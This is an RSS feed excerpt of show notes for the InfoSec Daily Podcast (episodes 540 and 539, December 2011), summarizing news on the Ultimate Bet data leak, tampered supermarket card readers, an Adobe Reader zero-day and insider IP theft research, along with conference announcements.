<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ultimate Bet, a property of the Cereus Poker Network, saw a slew of customer information posted online including players&#39; names, screen names, birth dates, e-mail addresses, phone numbers and mailing and IP addresses. Users&rsquo; UB account numbers were also found online in addition to their VIP, Affiliate and Blacklist statuses, all which are unique to the site. Customers&rsquo; credit card numbers and social security numbers don&rsquo;t appear to have been leaked in this particular incident.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to a report on</span><a href="http://www.pokernewsdaily.com/private-customer-data-leaked-from-ub-com-20702/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">PokerNewsDaily.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the information was initially posted on the Two Plus Two poker strategy forums and taken offline shortly after. Even though it was only available for a short period, the information was quickly copied and distributed across various online mediums.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://arstechnica.com/business/news/2011/12/hackers-hit-supermarket-self-checkout-lanes-steal-money-from-shoppers.ars"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/business/news/2011/12/hackers-hit-supermarket-self-checkout-lanes-steal-money-from-shoppers.ars</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Criminals have tampered with the credit and debit card readers at self-checkout lanes in more than 20 supermarkets operated by a California chain, allowing them to steal money from shoppers who used the compromised machines. The chain, Lucky Supermarkets, which is owned by Save Mart, is now inspecting the rest of its 234 stores in northern California and northern Nevada and urging customers who used self-checkout lanes to close their bank and credit card accounts.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lucky Supermarkets issued a consumer advisory Monday</span><a href="http://savemart.com/index.php?id=449"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">listing the stores confirmed to have been affected</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, while also saying, &quot;There have been approximately 80 employee and customer reports of either compromised account data or attempts to access account data, with the majority coming over this past weekend. &hellip; We strongly recommend our customers who used a self check-out lane in the affected stores contact their financial institution to close existing accounts and seek further advice. We continue to work with local, state, and federal law enforcement to find those responsible.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The</span><a href="http://www.mercurynews.com/breaking-news/ci_19480051"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Mercury News</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> reported today that Lucky Supermarkets has received more than 1,000 calls from customers saying they&#39;ve been victims of fraud. Lucky Supermarkets has been investigating the problem since November 11, when an employee performing routine maintenance on a self-checkout machine &quot;uncovered an extra computer board that had been placed inside the checkout machine, recording customers&#39; financial information,&quot; the paper said. When the supermarket chain initially warned customers on Nov. 23, there were not yet reports of accounts being compromised, but now they are pouring in. One San Jose resident told the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mercury News</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that $300 had been withdrawn from her checking account.</span></p>
<p>
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.theregister.co.uk/2011/12/07/cuckold_hacking_charges/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/07/cuckold_hacking_charges/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Michigan appeals court is trying to decide whether the state&#39;s anti hacking law should be invoked against a man who broke into his wife&#39;s Gmail account to see if she was having an affair.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Leon Walker, 34, faces a maximum of five years in prison for</span><a href="http://www.theregister.co.uk/2010/12/29/cuckold_computer_tech_hacking_charges/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">using a shared family computer</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to read his wife&#39;s personal email after she failed to return home one night. It turns out Clara Walker was indeed involved with another man, who just happened to be her previous husband.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attorneys for Leon Walker told judges with the Michigan Court of Appeals that the law their client was charged under was ambiguous and was never intended for domestic matters. It was passed in 1979 and was designed to prevent identity and trade secret theft. They also warned if charges go forward the law could criminalize activities such as parents monitoring their children&#39;s online activities.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Judges hearing the case,</span><a href="http://www.usatoday.com/news/nation/story/2011-12-07/email-hacking-cheating/51698546/1"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">according to</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">USA Today</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, didn&#39;t sound so sure.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Your client is being charged with security intellectual property &ndash; her email, accessing her intellectual property,&quot; judge Pat Donofrio said.</span></p>
<p>
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://threatpost.com/en_us/blogs/adobe-zero-day-targets-lockheed-martin-120711"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/adobe-zero-day-targets-lockheed-martin-120711</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adobe said </span><a href="http://threatpost.com/en_us/blogs/adobe-warns-critical-zero-day-flaw-reader-and-acrobat-120611"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">a previously undisclosed vulnerability in its Reader and Acrobat applications</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> was passed along by defense contractor Lockheed Martin, raising the specter of a targeted attack on the important military supplier.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In issuing a warning about a critical flaw on Tuesday, Adobe credied both Lockheed Martin and the Defense Security Information Exchange (DSIE) with reporting the hole. Those following the industry closely say that the two organizations were likely targeted in an attack leveraging the zero-day.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;My guess is that they got targeted and reported it to Adobe,&rdquo; Mila Parkour of the Contagio Malware Dump blog told</span><a href="http://www.cio.com/article/696049/Hackers_Exploit_Adobe_Reader_Zero_Day_May_Be_Targeting_Defense_Contractors?source=rss_security&amp;utm_source=dlvr.it&amp;utm_medium=twitter"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ComputerWorld&rsquo;s Gregg Keizer</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adobe initially gave credit to MITRE (as well as Lockheed), but has since revised their security advisory, giving credit to the DSIE instead MITRE. All three organizations are part of Defense Industrial Base (or DIB), of which the DSIE is a subset. Numerous government reports in recent years have described a sustained and sophisticated campaign of hacks and online attacks on DIB members, with many trails leading back to the People&#39;s Republic of China and Russia. In November, the Office of the National Counterintelligence Executive made the U.S. government&#39;s boldest claims yet about the cyber spying, accusing both countries of conducting far flung cyber espionage campaigns against U.S. and other Western firms in an effort to promote domestic interests.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Neither Lockheed nor the DSIE responded to Keizer&#39;s requests for comment. Adobe is reportedly planning to ship a patch for this bug next week.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is the second time this year that Lockheed has appeared in security headlines. They hit the news earlier this year, after attackers leveraged SecureID Tokens stolen from RSA in a separate attack also involving Adobe.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.securityweek.com/finding-devil-inside-psychology-insider-threat"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securityweek.com/finding-devil-inside-psychology-insider-threat</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Identifying a potential malicious insider before he or she is able to walk away with intellectual property can be the difference between a good night&rsquo;s sleep and several weeks&rsquo; worth of public relations fallout. According to psychologists Dr. Eric Shaw and Harley Stock, there are</span><a href="https://symantecevents.verite.com/23823/129830"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">warning signs organizations can heed</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> if they know what to look for.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a new report commissioned by Symantec, &ldquo;</span><a href="http://www.symantec.com/content/en/us/about/media/pdfs/symc_malicious_insider_whitepaper_Dec_2011.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Behavioral Risk Indicators of Malicious Insider Theft of Intellectual Property: Misreading the Writing on the Wall</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,&rdquo; Shaw and Stock analyzed insider breaches to get a sense of not only how insiders steal data, but who does it and why. Among their findings:</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull;&nbsp;&nbsp;&nbsp; Roughly 65% of insiders who steal intellectual property had already accepted positions with a competing company &#8211; or started their own &#8211; at the time of the theft.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull;&nbsp;&nbsp;&nbsp; People typically steal information they are authorized to access. According to their data, 75% of insiders stole material they were authorized to see.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull;&nbsp;&nbsp;&nbsp; The average insider IP theft is committed by a male employee about 37 years old who serves in a technical position such as an engineer, scientist or programmer. In addition, the majority of IP thieves had signed IP agreements, indicating that policies alone are often ineffective.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull;&nbsp;&nbsp;&nbsp; IP theft by insiders is often precipitated by professional setbacks. With many IP thieves, there is a sense of disgruntlement with the organization.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Organizations need to take a multi-disciplinary approach to dealing with insider threats that involves creating a team that includes not only IT security, but human resources and physical security as well, Shaw said. Silos in an organization can make it difficult to understand whether or not they are at risk, he added.</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-540-ultimate-bet-lucky-supermarket-cuckold-hacking-lockheed-martin-targeted-insider-psychology/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3245/0/infosec-daily-podcast-episode-540.mp3" length="20788582" type="audio/mpeg" />
		<itunes:duration>0:42:50</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 540 for December 7, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 540 for December 7, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	ISC2 Offical Results: @WIMREMES WINS!
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://threatpost.com/en_us/blogs/personal-information-35-million-poker-players-spilled-online-120611
&#160;
Customers of the online poker Website Ultimate Bet (UB) are the victims of a data breach that spilled the private information of up to 3.5 million of its customers online over the weekend.
&#160;
Ultimate Bet, a property of the Cereus Poker Network, saw a slew of customer information posted online including players&#39; names, screen names, birth dates, e-mail addresses, phone numbers and mailing and IP addresses. Users&#8217; UB account numbers were also found online in addition to their VIP, Affiliate and Blacklist statuses, all which are unique to the site. Customers&#8217; credit card numbers and social security numbers don&#8217;t appear to have been leaked in this particular incident.
&#160;
According to a report on PokerNewsDaily.com, the information was initially posted on the Two Plus Two poker strategy forums and taken offline shortly after. Even though it was only available for a short period, the information was quickly copied and distributed across various online mediums.
&#160;
Source: &#160;http://arstechnica.com/business/news/2011/12/hackers-hit-supermarket-self-checkout-lanes-steal-money-from-shoppers.ars
&#160;
Criminals have tampered with the credit and debit card readers at self-checkout lanes in more than 20 supermarkets operated by a California chain, allowing them to steal money from shoppers who used the compromised machines. The chain, Lucky Supermarkets, which is owned by Save Mart, is now inspecting the rest of its 234 stores in northern California and northern Nevada and urging customers who used self-checkout lanes to close their bank and credit card accounts.
&#160;
Lucky Supermarkets issued a consumer advisory Monday listing the stores confirmed to have been affected, wh[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 539 &#8211; Nmap Malware, DNSCrypt, International Checkout, GCHQ, India Facebook &amp; Steam</title>
		<link>http://www.isdpodcast.com/episode-539-nmap-malware-dnscrypt-international-checkout-gchq-india-facebook-steam</link>
		<comments>http://www.isdpodcast.com/episode-539-nmap-malware-dnscrypt-international-checkout-gchq-india-facebook-steam#comments</comments>
		<pubDate>Wed, 07 Dec 2011 02:02:24 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3239</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 539 for December 6, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rodstad and Themson Mester &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 539 for December 6, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rodstad and Themson Mester</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
